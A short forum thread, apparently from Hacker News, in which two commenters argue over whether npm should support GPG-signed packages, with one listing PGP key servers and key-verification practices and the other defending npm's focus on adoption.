|
|
|
|
|
|
by danjoc
3737 days ago
|
|
|
>From where do you get the public key to verify the GPG signature against? PGP key servers: hkps.pool.sks-keyservers.net
wwwkeys.pgp.net
pgp.mit.edu There are plenty more. You upload a public key, they relay them around. Read all about it. http://pgp.mit.edu/faq.html You can also attach an email address to the public key. You can send an encrypted email to that address and get an encrypted response back proving that the owner of that address has a copy of the private key. Now you just have to trust that package-signer@npmjs.org or whoever can keep his private key safe. You can even store a private key on a Yubikey device to limit theft of the private key to the theft of a physical token. Not having gpg signed packages is bad enough. Actively discouraging them and denying that pull request is mind-blowing to me personally. The idea that they are going to invent a better scheme is dangerous. They will screw it up, just like everybody else who ever tried that. Schneier's Law: Any person can invent a security system so clever that he or she can't imagine a way of breaking it. |
|
|
Which is exactly the point that you're missing. "The idea that they are going to invent a better scheme"—by "better scheme" you're thinking more secure, but the only people under the impression that NPM thinks they're going to invent a more secure system are people making the strawman argument you are. The strawman is that NPM's scheme isn't intended to be "better" in the sense of being more secure, it's intended to be better in the sense of improving the community in all the ways that aren't security.
That's wonderful and I love reading about it, I'm sure it works great for you, but surely you're aware that the vast majority of the world doesn't use encrypted email or PGP or any of the other decades-old cryptographic technologies. NPM doesn't think they're going to invent a scheme that's more secure than all that. NPM thinks they're going to invent a scheme that's more successful than all that.